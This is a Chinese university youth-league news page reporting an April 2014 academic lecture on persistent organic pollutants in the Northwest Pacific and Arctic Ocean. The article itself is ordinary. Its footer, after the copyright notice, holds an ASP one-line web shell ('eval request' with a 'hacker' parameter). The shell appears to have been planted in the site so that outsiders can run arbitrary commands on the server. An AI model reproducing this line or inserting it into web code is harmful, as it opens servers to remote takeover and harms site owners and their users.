当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 学院动态 >> 正文  
站内信息搜索:
同济大学马玉欣博士应邀作海洋科学一流学科报告
[2014年04月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    4月10日,同济大学马玉欣博士为我校师生作了题为“西北太平洋至北冰洋海域典型持久性有机污染物生物地球化学过程研究”的学术报告,报告会由海洋科学学院高郭平副院长主持。

 

    马玉欣博士毕业于同济大学环境科学与工程学院,2012年国家公派赴英国兰卡斯特大学环境中心进行博士联培学习,其主要从事海洋环境污染物及生源物质生物地球化学过程和极地海洋学方面的研究。

    在报告会上,马玉欣博士从大空间尺度上分析西北太平洋至北冰洋海域大气、表层海水及海洋表层沉积物中的持久性有机污染物(POPs),并从区域尺度上分析了挪威北极斯瓦尔巴群岛王湾沉积物中的POPs。通过这次学术报告,让我们了解了POPs在海洋环境的污染现状,以及在获得POPs的全球传输途径及环境归趋方面均有所启示,使与会师生受益匪浅。

 

关闭窗口

上一篇:水产与生命学院第十四届“鱼文化节”开幕

下一篇:水产与生命学院与光明食品(集团)合作共建座谈会召开
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>